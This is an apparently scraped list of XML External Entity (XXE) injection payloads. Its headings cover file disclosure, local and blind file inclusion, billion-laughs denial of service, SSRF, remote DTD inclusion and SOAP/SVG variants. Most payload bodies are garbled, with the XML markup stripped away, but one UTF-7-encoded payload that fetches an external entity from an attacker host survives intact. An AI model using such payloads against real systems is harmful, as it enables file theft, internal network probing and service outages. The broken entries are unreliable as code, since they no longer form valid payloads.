# XML External Entity (XXE) Injection Payloads * XXE : Classic XXE ]> &file; ]>&xxe; ]>&xxe; ]>&xxe; * XXE: Basic XML Example John Doe * XXE: Entity Example ]> John &example; * XXE: File Disclosure ]> John &ent; * XXE: Denial-of-Service Example &lol9; * XXE: Local File Inclusion Example ]>&xxe; * XXE: Blind Local File Inclusion Example (When first case doesn't return anything.) ]>&blind; * XXE: Access Control Bypass (Loading Restricted Resources - PHP example) ]> ∾ * XXE:SSRF ( Server Side Request Forgery ) Example ]>&xxe; * XXE: (Remote Attack - Through External Xml Inclusion) Exmaple ]> 3..2..1...&test * XXE: UTF-7 Exmaple +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4 * XXE: Base64 Encoded %init; ]> * XXE: XXE inside SOAP Example %dtd;]>]]> * XXE: XXE inside SVG